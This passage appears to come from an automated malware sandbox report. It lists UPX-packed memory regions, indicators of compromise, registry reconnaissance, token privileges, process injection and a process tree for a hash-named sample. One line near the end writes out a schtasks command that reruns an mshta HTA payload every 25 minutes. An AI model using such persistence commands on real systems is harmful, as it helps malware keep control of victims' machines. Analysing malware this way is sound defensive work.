behavioral2/memory/5148-405-0x00007FF9915D0000-0x00007FF991AF0000-memory.dmp upx behavioral2/memory/5148-419-0x00007FF9A64D0000-0x00007FF9A64DD000-memory.dmp upx behavioral2/memory/5148-418-0x00007FF99C520000-0x00007FF99C54B000-memory.dmp upx behavioral2/memory/5148-417-0x00007FF9912C0000-0x00007FF99137C000-memory.dmp upx behavioral2/memory/5148-416-0x00007FF9A09D0000-0x00007FF9A09FE000-memory.dmp upx behavioral2/memory/5148-415-0x00007FF991380000-0x00007FF9915C9000-memory.dmp upx behavioral2/memory/5148-414-0x00007FF9A0A00000-0x00007FF9A0A24000-memory.dmp upx behavioral2/memory/5148-413-0x00007FF9A4AD0000-0x00007FF9A4AE2000-memory.dmp upx behavioral2/memory/5148-412-0x00007FF9A1880000-0x00007FF9A18C3000-memory.dmp upx behavioral2/memory/5148-411-0x00007FF9A0B60000-0x00007FF9A0C7C000-memory.dmp upx behavioral2/memory/5148-410-0x00007FF9A4AF0000-0x00007FF9A4B16000-memory.dmp upx behavioral2/memory/5148-409-0x00007FF9A5940000-0x00007FF9A594B000-memory.dmp upx behavioral2/memory/5148-408-0x00007FF9A4BF0000-0x00007FF9A4C04000-memory.dmp upx behavioral2/memory/5148-407-0x00007FF9A1490000-0x00007FF9A1517000-memory.dmp upx behavioral2/memory/5148-406-0x00007FF9A0C80000-0x00007FF9A0D4F000-memory.dmp upx behavioral2/memory/5148-394-0x00007FF991AF0000-0x00007FF9920D9000-memory.dmp upx behavioral2/memory/5148-404-0x00007FF9A10A0000-0x00007FF9A116D000-memory.dmp upx behavioral2/memory/5148-403-0x00007FF9A4B20000-0x00007FF9A4B53000-memory.dmp upx behavioral2/memory/5148-402-0x00007FF9A64C0000-0x00007FF9A64CD000-memory.dmp upx behavioral2/memory/5148-401-0x00007FF9A4B60000-0x00007FF9A4B96000-memory.dmp upx behavioral2/memory/5148-400-0x00007FF9A4C10000-0x00007FF9A4C3D000-memory.dmp upx behavioral2/memory/5148-399-0x00007FF9A5900000-0x00007FF9A5919000-memory.dmp upx behavioral2/memory/5148-397-0x00007FF9A6790000-0x00007FF9A67A9000-memory.dmp upx behavioral2/memory/5148-396-0x00007FF9A9150000-0x00007FF9A915F000-memory.dmp upx behavioral2/memory/5148-395-0x00007FF9A5190000-0x00007FF9A51B3000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000024270-130.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 4556 2480 WerFault.exe 103 20252 6692 WerFault.exe 219 20280 6908 WerFault.exe 220 15088 20376 WerFault.exe 292 15336 18400 WerFault.exe 308 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 1ab6d4cae8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 310PDDDSLO38N3Z92I98IN4L8EKWN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 1ab6d4cae8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67d7a1d3b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b10ab05d2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3179f4144f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f7d2444297.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language U6eP6xfYmpVYiDt2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7yc2nozmoz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00e7be516b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c87f8d2b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5b90e5b727.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ab6d4cae8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Vv4PwOXY3OMt59cD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 071adce9c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d3979aba3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d3979aba3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OsWdfcBuOS504XIe.exe -
Checks processor information in registry 2 TTPs 34 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 920 timeout.exe 2460 timeout.exe 11216 timeout.exe 9732 timeout.exe 864 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 3100 taskkill.exe 4948 taskkill.exe 3180 taskkill.exe 4628 taskkill.exe 4912 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133866224819595721" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3184 schtasks.exe 5720 schtasks.exe 2392 SCHTASKS.exe 1888 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1416 powershell.exe 1416 powershell.exe 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 5472 rapes.exe 5472 rapes.exe 4480 rapes.exe 4480 rapes.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 3120 UD49QH6.exe 5528 cronikxqqq.exe 5528 cronikxqqq.exe 4432 powershell.exe 4432 powershell.exe 5528 cronikxqqq.exe 5528 cronikxqqq.exe 5528 cronikxqqq.exe 5528 cronikxqqq.exe 5528 cronikxqqq.exe 5528 cronikxqqq.exe 1672 TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE 1672 TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE 464 powershell.exe 464 powershell.exe 4968 powershell.exe 4968 powershell.exe 5640 powershell.exe 5640 powershell.exe 1540 powershell.exe 3352 3179f4144f.exe 3352 3179f4144f.exe 1540 powershell.exe 3228 MSBuild.exe 3228 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4336 483d2fa8a0d53818306efeb32d3.exe 4336 483d2fa8a0d53818306efeb32d3.exe 2364 5c87f8d2b6.exe 2364 5c87f8d2b6.exe 3228 MSBuild.exe 3228 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 4500 MSBuild.exe 5088 chrome.exe 5088 chrome.exe 2364 5c87f8d2b6.exe 2364 5c87f8d2b6.exe 2364 5c87f8d2b6.exe 2364 5c87f8d2b6.exe 2364 5c87f8d2b6.exe 2364 5c87f8d2b6.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 15016 SplashWin.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5600 msedge.exe 5600 msedge.exe 7688 chrome.exe 7688 chrome.exe 7688 chrome.exe 7688 chrome.exe 10136 msedge.exe 10136 msedge.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
description pid Process Token: SeDebugPrivilege 1416 powershell.exe Token: SeImpersonatePrivilege 3120 UD49QH6.exe Token: SeImpersonatePrivilege 3120 UD49QH6.exe Token: SeDebugPrivilege 2480 cronikxqqq.exe Token: SeImpersonatePrivilege 5528 cronikxqqq.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeImpersonatePrivilege 5528 cronikxqqq.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 4968 powershell.exe Token: SeDebugPrivilege 5640 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeImpersonatePrivilege 4500 MSBuild.exe Token: SeImpersonatePrivilege 4500 MSBuild.exe Token: SeImpersonatePrivilege 2364 5c87f8d2b6.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeImpersonatePrivilege 2364 5c87f8d2b6.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeImpersonatePrivilege 5184 crypted.exe Token: SeImpersonatePrivilege 5184 crypted.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeImpersonatePrivilege 5568 MSBuild.exe Token: SeImpersonatePrivilege 5568 MSBuild.exe Token: SeShutdownPrivilege 5088 chrome.exe Token: SeCreatePagefilePrivilege 5088 chrome.exe Token: SeDebugPrivilege 3180 taskkill.exe Token: SeDebugPrivilege 4628 taskkill.exe Token: SeDebugPrivilege 4912 taskkill.exe Token: SeDebugPrivilege 3100 taskkill.exe Token: SeDebugPrivilege 4948 taskkill.exe Token: SeDebugPrivilege 4540 firefox.exe Token: SeDebugPrivilege 4540 firefox.exe Token: SeDebugPrivilege 1572 67d7a1d3b1.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeImpersonatePrivilege 7280 UD49QH6.exe Token: SeImpersonatePrivilege 7280 UD49QH6.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeShutdownPrivilege 7688 chrome.exe Token: SeCreatePagefilePrivilege 7688 chrome.exe Token: SeImpersonatePrivilege 15316 7d3979aba3.exe Token: SeImpersonatePrivilege 15316 7d3979aba3.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 3528 00e7be516b.exe 3528 00e7be516b.exe 3528 00e7be516b.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5088 chrome.exe 5600 msedge.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 4540 firefox.exe 6084 1ab6d4cae8.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 6084 1ab6d4cae8.exe 4540 firefox.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 3528 00e7be516b.exe 3528 00e7be516b.exe 3528 00e7be516b.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 4540 firefox.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe 6084 1ab6d4cae8.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4540 firefox.exe 8300 HmngBpR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5908 wrote to memory of 1064 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 86 PID 5908 wrote to memory of 1064 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 86 PID 5908 wrote to memory of 1064 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 86 PID 5908 wrote to memory of 4024 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 87 PID 5908 wrote to memory of 4024 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 87 PID 5908 wrote to memory of 4024 5908 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 87 PID 1064 wrote to memory of 3184 1064 cmd.exe 89 PID 1064 wrote to memory of 3184 1064 cmd.exe 89 PID 1064 wrote to memory of 3184 1064 cmd.exe 89 PID 4024 wrote to memory of 1416 4024 mshta.exe 91 PID 4024 wrote to memory of 1416 4024 mshta.exe 91 PID 4024 wrote to memory of 1416 4024 mshta.exe 91 PID 1416 wrote to memory of 4732 1416 powershell.exe 93 PID 1416 wrote to memory of 4732 1416 powershell.exe 93 PID 1416 wrote to memory of 4732 1416 powershell.exe 93 PID 4732 wrote to memory of 5472 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 94 PID 4732 wrote to memory of 5472 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 94 PID 4732 wrote to memory of 5472 4732 TempHECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE 94 PID 5472 wrote to memory of 5172 5472 rapes.exe 96 PID 5472 wrote to memory of 5172 5472 rapes.exe 96 PID 5472 wrote to memory of 5172 5472 rapes.exe 96 PID 5172 wrote to memory of 2760 5172 amnew.exe 97 PID 5172 wrote to memory of 2760 5172 amnew.exe 97 PID 5172 wrote to memory of 2760 5172 amnew.exe 97 PID 5472 wrote to memory of 3120 5472 rapes.exe 98 PID 5472 wrote to memory of 3120 5472 rapes.exe 98 PID 5472 wrote to memory of 3120 5472 rapes.exe 98 PID 5472 wrote to memory of 3680 5472 rapes.exe 100 PID 5472 wrote to memory of 3680 5472 rapes.exe 100 PID 5472 wrote to memory of 3680 5472 rapes.exe 100 PID 2760 wrote to memory of 1188 2760 futors.exe 101 PID 2760 wrote to memory of 1188 2760 futors.exe 101 PID 1188 wrote to memory of 5148 1188 trano1221.exe 102 PID 1188 wrote to memory of 5148 1188 trano1221.exe 102 PID 2760 wrote to memory of 2480 2760 futors.exe 103 PID 2760 wrote to memory of 2480 2760 futors.exe 103 PID 2760 wrote to memory of 2480 2760 futors.exe 103 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 2480 wrote to memory of 5528 2480 cronikxqqq.exe 104 PID 5472 wrote to memory of 3528 5472 rapes.exe 105 PID 5472 wrote to memory of 3528 5472 rapes.exe 105 PID 5472 wrote to memory of 3528 5472 rapes.exe 105 PID 3528 wrote to memory of 2876 3528 00e7be516b.exe 107 PID 3528 wrote to memory of 2876 3528 00e7be516b.exe 107 PID 3528 wrote to memory of 2876 3528 00e7be516b.exe 107 PID 3528 wrote to memory of 348 3528 00e7be516b.exe 108 PID 3528 wrote to memory of 348 3528 00e7be516b.exe 108 PID 3528 wrote to memory of 348 3528 00e7be516b.exe 108 PID 2876 wrote to memory of 5720 2876 cmd.exe 112 PID 2876 wrote to memory of 5720 2876 cmd.exe 112 PID 2876 wrote to memory of 5720 2876 cmd.exe 112 PID 348 wrote to memory of 4432 348 mshta.exe 113 PID 348 wrote to memory of 4432 348 mshta.exe 113 PID 348 wrote to memory of 4432 348 mshta.exe 113 PID 2760 wrote to memory of 3048 2760 futors.exe 116 PID 2760 wrote to memory of 3048 2760 futors.exe 116 PID 2760 wrote to memory of 3048 2760 futors.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe"C:\Users\Admin\AppData\Local\Temp\d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn kD2RPmajX26 /tr "mshta C:\Users\Admin\AppData\Local\Temp\onEpcChGT.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
